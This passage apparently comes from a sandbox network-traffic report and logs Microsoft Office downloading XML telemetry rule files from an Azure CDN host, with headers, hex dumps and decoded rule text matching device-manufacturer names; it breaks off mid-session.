                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:56 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:56 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:56 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 419
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                    ETag: "0x8DC582B9748630E"
                                                    x-ms-request-id: a56dfe0e-901e-0029-2976-3b274a000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184456Z-174c587ffdfcj798hC1TEB9bq400000006cg00000000vnsy
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    73192.168.2.44983013.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:56 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:57 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:56 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 472
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                    ETag: "0x8DC582B9DACDF62"
                                                    x-ms-request-id: 2b92647c-c01e-00a2-646f-3b2327000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184456Z-174c587ffdfldtt2hC1TEBwv9c000000063000000000qq0k
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    74192.168.2.44983213.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:56 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:57 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:57 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 468
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                    ETag: "0x8DC582B9C8E04C8"
                                                    x-ms-request-id: 6ea5360a-801e-002a-4904-3e31dc000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184457Z-178bfbc474bxkclvhC1NYC69g400000007w00000000040ez
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    75192.168.2.44983313.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:56 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:57 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:57 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 428
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                    ETag: "0x8DC582BAC4F34CA"
                                                    x-ms-request-id: 62a4a1a4-401e-00ac-0c3d-3d0a97000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184457Z-174c587ffdfmrvb9hC1TEBtn38000000066g00000000zmus
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:57 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    76192.168.2.44983113.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:56 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:57 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:57 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 404
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                    ETag: "0x8DC582B9E8EE0F3"
                                                    x-ms-request-id: 4ec414f5-001e-0046-5fa0-3bda4b000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184457Z-174c587ffdfmlsmvhC1TEBvyks00000006kg000000000uds
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:57 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    77192.168.2.44983413.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:58 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:59 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:58 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 499
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                    ETag: "0x8DC582B98CEC9F6"
                                                    x-ms-request-id: 0498098b-f01e-0003-1354-3d4453000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184458Z-15b8b599d88l2dpthC1TEBmzr000000006b00000000063v4
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:59 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    78192.168.2.44983513.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:58 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:59 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:59 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 415
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                    ETag: "0x8DC582B988EBD12"
                                                    x-ms-request-id: 47ff93a4-401e-0083-0f5d-3e075c000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184459Z-174c587ffdfx984chC1TEB676g00000006bg0000000093vc
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:59 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    79192.168.2.44983813.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:59 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:59 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:59 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 494
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                    ETag: "0x8DC582BB8972972"
                                                    x-ms-request-id: 81bf26fc-f01e-0099-6bb6-3e9171000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184459Z-178bfbc474bscnbchC1NYCe7eg000000080000000000cs9c
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:59 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    80192.168.2.44983713.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:59 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:59 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:59 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 471
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                    ETag: "0x8DC582BB5815C4C"
                                                    x-ms-request-id: 12cef178-a01e-0070-7e6c-3d573b000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184459Z-174c587ffdfb5q56hC1TEB04kg000000068g00000000b1d9
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:59 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    81192.168.2.44983613.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:59 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:44:59 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:59 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 419
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                    ETag: "0x8DC582BB32BB5CB"
                                                    x-ms-request-id: e1811c2a-201e-00aa-06c6-3e3928000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184459Z-178bfbc474bbcwv4hC1NYCypys00000007s0000000007tsg
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:44:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    82192.168.2.44983913.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:00 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:01 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:01 GMT
                                                    Content-Type: text/xml
                                                    Content-Length: 420
                                                    Connection: close
                                                    Cache-Control: public, max-age=604800, immutable
                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                    ETag: "0x8DC582B9DAE3EC0"
                                                    x-ms-request-id: 03bcf0c5-601e-0002-337d-3da786000000
                                                    x-ms-version: 2018-03-28
                                                    x-azure-ref: 20241125T184501Z-15b8b599d88m7pn7hC1TEB4axw00000006a000000000m2sn
                                                    x-fd-int-roxy-purgeid: 0
                                                    X-Cache: TCP_HIT
                                                    Accept-Ranges: bytes
                                                    2024-11-25 18:45:01 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    83192.168.2.44984013.107.246.63443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:45:01 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept-Encoding: gzip
                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                    Host: otelrules.azureedge.net
                                                    2024-11-25 18:45:01 UTC470INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:45:01 GMT
